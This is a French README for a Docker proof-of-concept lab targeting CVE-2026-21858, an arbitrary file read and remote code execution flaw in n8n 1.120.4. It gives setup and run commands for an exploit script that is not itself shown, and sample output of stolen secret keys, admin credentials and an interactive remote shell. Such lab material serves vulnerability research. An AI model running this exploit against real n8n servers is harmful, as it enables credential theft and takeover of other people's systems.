
Environnement PoC basé sur Docker et script d'exploit pour CVE-2026-21858, une faille de lecture arbitraire de fichiers et de RCE dans n8n 1.120.4, permettant l'extraction de secrets et un shell interactif.
Environnement PoC pour n8n 1.120.4 avec un workflow Form Trigger et un script d'exploit.
Dockerfile — construit l'environnement n8n vulnérablerun.bat — lance le conteneur (Windows)workflow.txt — workflow n8n (inclut le Form Trigger)poc.py — script PoCrequirements.txt — dépendances du PoCdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, identifiants admin) depuis la cible.n8n-shell>) est fournie.id) renvoie la sortie de l'environnement cible (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
Nous publions une analyse de CVE et de malware une fois par mois. Si cela vous intéresse, veuillez suivre les liens ci-dessous pour consulter nos publications.